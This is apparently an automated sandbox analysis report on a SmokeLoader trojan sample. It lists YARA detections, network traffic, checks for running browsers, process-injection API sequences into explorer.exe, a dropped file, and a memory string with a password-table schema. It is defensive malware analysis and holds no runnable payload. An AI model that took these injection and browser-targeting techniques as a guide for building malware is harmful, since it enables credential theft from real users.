                      Source: explorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
                      Source: explorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/sports/other/predicting-what-the-pac-12-would-look-like-after-expansion-wi
                      Source: explorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-world
                      Source: explorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/sports/other/washington-state-ad-asks-ncaa-for-compassion-and-understandin
                      Source: explorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/accuweather-el-ni
                      Source: explorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/first-map-of-earth-s-lost-continent-has-been-published/
                      Source: explorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/stop-planting-new-forests-scientists-say/ar-AA1hFI09
                      Source: explorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINt
                      Source: explorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      barindex
                      Yara detected SmokeLoader
                      Source: Yara matchFile source: 0000000C.00000002.3926284328.0000000000801000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.3926530110.0000000003001000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 7064, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 6984, type: MEMORYSTR
                      Source: Yara matchFile source: 172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exe, type: SAMPLE
                      Source: Yara matchFile source: 4.0.hfetwhc.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.0.hfetwhc.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.hfetwhc.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.hfetwhc.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.1490295117.00000000005E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.1727138000.00000000004F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1490679568.0000000002261000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.1726957933.00000000001F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: C:\Users\user\AppData\Roaming\hfetwhc, type: DROPPED

                      E-Banking Fraud

                      barindex
                      Checks if browser processes are running
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: StrStrIA, chrome.exe|opera.exe|msedge.exe9_2_03222EA8
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpiA,lstrcmpiA,GetCommandLineW,CommandLineToArgvW,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpiA,lstrcmpiA,lstrcmpiA,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpiA,GetCommandLineA,StrStrIA,lstrcmpiA,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,CloseHandle,Sleep, firefox.exe9_2_03223862
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpiA,lstrcmpiA,GetCommandLineW,CommandLineToArgvW,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpiA,lstrcmpiA,lstrcmpiA,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpiA,GetCommandLineA,StrStrIA,lstrcmpiA,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,CloseHandle,Sleep, iexplore.exe9_2_03223862
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpiA,lstrcmpiA,GetCommandLineW,CommandLineToArgvW,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpiA,lstrcmpiA,lstrcmpiA,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpiA,GetCommandLineA,StrStrIA,lstrcmpiA,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,CloseHandle,Sleep, microsoftedgecp.exe9_2_03223862
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpiA,lstrcmpiA,GetCommandLineW,CommandLineToArgvW,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpiA,lstrcmpiA,lstrcmpiA,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpiA,GetCommandLineA,StrStrIA,lstrcmpiA,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,CloseHandle,Sleep, chrome.exe9_2_03223862

                      System Summary

                      barindex
                      Malicious sample detected (through community Yara rule)
                      Source: 00000000.00000002.1490295117.00000000005E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                      Source: 00000004.00000002.1727138000.00000000004F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                      Source: 00000000.00000002.1490679568.0000000002261000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                      Source: 00000004.00000002.1726957933.00000000001F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                      PE file has a writeable .text section
                      Source: 172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      Source: hfetwhc.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      Source: C:\Windows\explorer.exeProcess Stats: CPU usage > 49%
                      Source: C:\Users\user\Desktop\172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exeCode function: 0_2_00402600 NtOpenKey,NtEnumerateKey,NtEnumerateKey,NtClose,0_2_00402600
                      Source: C:\Users\user\Desktop\172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exeCode function: 0_2_00402FFC RtlCreateUserThread,NtTerminateProcess,0_2_00402FFC
                      Source: C:\Users\user\Desktop\172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exeCode function: 0_2_00401597 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401597
                      Source: C:\Users\user\Desktop\172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exeCode function: 0_2_0040250F NtOpenKey,NtEnumerateKey,NtEnumerateKey,0_2_0040250F
                      Source: C:\Users\user\Desktop\172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exeCode function: 0_2_004015C6 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_004015C6
                      Source: C:\Users\user\Desktop\172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exeCode function: 0_2_004015C9 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_004015C9
                      Source: C:\Users\user\Desktop\172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exeCode function: 0_2_004032DC NtTerminateProcess,RtlInitUnicodeString,ExpandEnvironmentStringsW,CreateFileW,CreateFileMappingW,MapViewOfFile,NtMapViewOfSection,NtDuplicateObject,NtQuerySystemInformation,NtOpenKey,strstr,tolower,0_2_004032DC
                      Source: C:\Users\user\Desktop\172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exeCode function: 0_2_004022DE NtQuerySystemInformation,0_2_004022DE
                      Source: C:\Users\user\Desktop\172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exeCode function: 0_2_00402595 NtOpenKey,NtEnumerateKey,NtEnumerateKey,0_2_00402595
                      Source: C:\Users\user\Desktop\172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exeCode function: 0_2_004015A2 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_004015A2
                      Source: C:\Users\user\Desktop\172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exeCode function: 0_2_004022A8 NtQuerySystemInformation,0_2_004022A8
                      Source: C:\Users\user\Desktop\172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exeCode function: 0_2_004015AE NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_004015AE
                      Source: C:\Users\user\Desktop\172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exeCode function: 0_2_004023B0 NtQuerySystemInformation,NtQueryInformationProcess,NtOpenKey,NtEnumerateKey,NtEnumerateKey,0_2_004023B0
                      Source: C:\Users\user\Desktop\172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exeCode function: 0_2_004015B2 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_004015B2
                      Source: C:\Users\user\Desktop\172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exeCode function: 0_2_004015B5 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_004015B5
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_007E4B92 RtlMoveMemory,NtUnmapViewOfSection,7_2_007E4B92
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_007E33C3 NtQueryInformationFile,7_2_007E33C3
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_007E342B NtQueryObject,NtQueryObject,RtlMoveMemory,7_2_007E342B
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_007E349B CreateFileW,OpenProcess,NtQueryInformationProcess,NtQueryInformationProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,lstrcmpiW,NtQueryObject,StrRChrW,StrRChrW,lstrcmpiW,GetFileSize,SetFilePointer,SetFilePointer,ReadFile,SetFilePointer,CloseHandle,CloseHandle,CloseHandle,7_2_007E349B
                      Source: C:\Windows\explorer.exeCode function: 8_2_00A338B0 NtUnmapViewOfSection,8_2_00A338B0
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_03223D8D RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,9_2_03223D8D
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_03222E1B OpenProcess,lstrcmpiA,NtQueryInformationProcess,NtQueryInformationProcess,StrStrIW,9_2_03222E1B
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_03221FE5 lstrcmpiA,OpenProcess,NtSetInformationProcess,CloseHandle,NtUnmapViewOfSection,NtUnmapViewOfSection,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,CloseHandle,CreateMutexA,GetLastError,CloseHandle,Sleep,GetModuleHandleA,GetProcAddress,ReadProcessMemory,WriteProcessMemory,CreateRemoteThread,CloseHandle,Sleep,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,9_2_03221FE5
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_03221F4E NtCreateSection,NtMapViewOfSection,9_2_03221F4E
                      Source: C:\Windows\explorer.exeCode function: 10_2_00D95300 NtUnmapViewOfSection,10_2_00D95300
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_03001016 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep,11_2_03001016
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_03001A80 NtCreateSection,NtMapViewOfSection,11_2_03001A80
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_03001819 lstrcmpiA,OpenProcess,NtSetInformationProcess,CloseHandle,NtUnmapViewOfSection,NtUnmapViewOfSection,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,CloseHandle,CreateMutexA,GetLastError,CloseHandle,Sleep,GetModuleHandleA,GetProcAddress,ReadProcessMemory,WriteProcessMemory,CreateRemoteThread,CloseHandle,Sleep,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,11_2_03001819
                      Source: C:\Windows\explorer.exeCode function: 12_2_0080355C NtUnmapViewOfSection,12_2_0080355C
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_030C1F82 RtlMoveMemory,NtUnmapViewOfSection,13_2_030C1F82
                      Source: C:\Users\user\Desktop\172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exeCode function: 0_2_004032DC0_2_004032DC
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_007E21987_2_007E2198
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_007EC2F97_2_007EC2F9
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_007FB35C7_2_007FB35C
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_008344387_2_00834438
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_007FB97E7_2_007FB97E
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_007E6E6A7_2_007E6E6A
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_00805F087_2_00805F08
                      Source: C:\Windows\explorer.exeCode function: 8_2_00A31E208_2_00A31E20
                      Source: C:\Windows\explorer.exeCode function: 10_2_00D92C0010_2_00D92C00
                      Source: C:\Windows\explorer.exeCode function: 12_2_0080205412_2_00802054
                      Source: C:\Windows\explorer.exeCode function: 12_2_0080286012_2_00802860
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_030CEA1C13_2_030CEA1C
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_030CFAB413_2_030CFAB4
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_030C3DE213_2_030C3DE2
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_030C444513_2_030C4445
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_030CC45213_2_030CC452
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_030C80F613_2_030C80F6
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 007E7F70 appears 32 times
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 030C8F30 appears 32 times
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 007E8801 appears 40 times
                      Source: WalletService.dll.mui.13.drStatic PE information: No import functions for PE file found
                      Source: hfetwhc.2.drStatic PE information: No import functions for PE file found
                      Source: 172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exeStatic PE information: No import functions for PE file found
                      Source: 172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                      Source: 00000000.00000002.1490295117.00000000005E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                      Source: 00000004.00000002.1727138000.00000000004F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                      Source: 00000000.00000002.1490679568.0000000002261000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                      Source: 00000004.00000002.1726957933.00000000001F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                      Source: 172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      Source: hfetwhc.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      Source: hfetwhc.2.drStatic PE information: Section .text
                      Source: 172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exeStatic PE information: Section .text
                      Source: classification engineClassification label: mal100.bank.troj.spyw.evad.winEXE@17/55@3/2
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_03223BE1 wsprintfA,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep,9_2_03223BE1
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_007E4440 CoCreateInstance,SysAllocString,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,wsprintfW,7_2_007E4440
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\hfetwhcJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\BD1F.tmpJump to behavior
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exeJump to behavior
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exeJump to behavior
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exeJump to behavior
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
                      Source: 172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      Source: C:\Windows\explorer.exeFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: C96A.tmp.7.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                      Source: 172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exeReversingLabs: Detection: 47%
